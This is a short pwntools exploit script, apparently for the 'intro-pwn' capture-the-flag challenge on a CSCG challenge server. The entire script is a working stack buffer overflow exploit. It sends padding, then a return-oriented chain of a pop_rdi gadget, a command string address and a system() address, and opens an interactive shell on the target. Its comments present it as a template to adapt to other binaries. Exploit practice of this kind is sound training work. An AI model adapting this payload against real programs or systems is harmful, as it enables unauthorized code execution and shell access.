from pwn import * # Set the context for the binary context.binary = './intro-pwn' # Replace with your binary's name # Choose local or remote LOCAL = True # Change to False if connecting remotely if LOCAL: p = process(context.binary.path) else: p = remote("a05e1cfb314bce1c87472c7e-1024-intro-pwn-1.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience def send_payload(payload): p.sendline(payload) def recv_until(delim): return p.recvuntil(delim) def interact(): p.interactive() address = 0x4011c7 system = 0x4011d5 pop_rdi = 0x401205 command_addr = 0x402010 # Example interaction recv_until(b'What is your name?') payload = b'A' * 16 + b'\x00' * 8 + p64(pop_rdi) + p64(command_addr) + p64(system)# Adjust based on your needs send_payload(payload) interact() # Keep the shell open